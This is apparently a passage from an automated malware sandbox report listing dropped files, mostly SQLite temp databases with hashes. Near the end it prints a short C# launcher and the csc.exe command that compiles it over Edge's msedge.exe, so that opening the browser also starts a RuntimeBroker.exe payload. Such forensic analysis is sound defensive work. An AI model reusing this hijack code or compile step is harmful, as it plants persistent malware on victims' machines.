                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\uY9nZ7XoIs

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\udeAfSoohe

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\uuegMOlRWI

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\uzdcuQT1yi

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\vLdAircKyJ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\vcDlopJP0m

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\vqLCjYY7P2

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\w658geteEv

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\w65IksJzRE

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\wIK1Oqg4QT

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\wRUFnyXceJ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\wUKbh1r419

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\wZSuZ37Yxz

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\wZVpb5Ud7E

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\wi7lufRIIP

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\wqUMEPukBj

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\xLeWyYh1fW

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\xiLxvRpBYb

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.0.cs

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                  Category:dropped
                                                                                  Size (bytes):408
                                                                                  Entropy (8bit):4.985269740546796
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLu5j3iFkD:JNVQIbSfhWLzIiFkMSfh0jSFkD
                                                                                  MD5:622899BB563C17F8517CB53DE570729F
                                                                                  SHA1:0587BEED6042E86936E609C9EF239D8089FD46DC
                                                                                  SHA-256:94068D8CB2D5DA87C3AAEA2D07259F901FDB2E47426D8768B30C3C4007A52EB0
                                                                                  SHA-512:02B11AF585CECCE13B3DFD4534E78B2228B27DF3AB091E785DB9999C88BFF1EFB4F158CDB4D920F46051EF8F119A30421E34F75AED5CD54763B055C729D236B3
                                                                                  Malicious:false
                                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\LiveKernelReports\RuntimeBroker.exe"); } catch { } }).Start();. }.}.

                                                                                  C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):268
                                                                                  Entropy (8bit):5.106435571346186
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723fZMaQMNxn:Hu7L//TRRzscQnahwSx
                                                                                  MD5:352EAA4E8013920152C2F8D9B3F9A1E9
                                                                                  SHA1:11FC660AE48DBCD6892C87C684DA8174E0EB7F90
                                                                                  SHA-256:C3983440F70051BDD5F9BBDC1121C07D7E6ABB3A84182DABB35F25FF2BDCBAA1
                                                                                  SHA-512:5A43ED61517766AEC7866B9F05AB22E217F5749F5602984264C527579C670CEB3352A4B4DC46740C3296F0C867E17A9B5BDF64F3C20098053F984B441B4F2523
                                                                                  Malicious:true
                                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.0.cs"

                                                                                  C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.out

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):771
                                                                                  Entropy (8bit):5.256422972153224
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:wMjI/un/VRzstnaFUKax5DqBVKVrdFAMBJTH:wMjN/VRzPFUK2DcVKdBJj
                                                                                  MD5:35CB11D1A9E6E689880DB32BB1784109
                                                                                  SHA1:4D61DF660A2DB681C81DE27FDC3B224D85C0CCC4
                                                                                  SHA-256:48BE6764DC62D5B9AAB4801CB4BC649F43585B25BE8B053DA0BF44A246CBDE0D
                                                                                  SHA-512:EAF953296BA76564F18E7573B4A3B7CC6ECEA44CF6BACA59C61254FB12B623B331440635E5A275CF5A891BC410DDBA6957ACF656B9C38B3649D5C3B753E983EB
                                                                                  Malicious:false
                                                                                  Preview:.C:\ServerWinRuntimeBroker> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                  C:\Users\user\AppData\Local\Temp\xvscHGCQKV

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
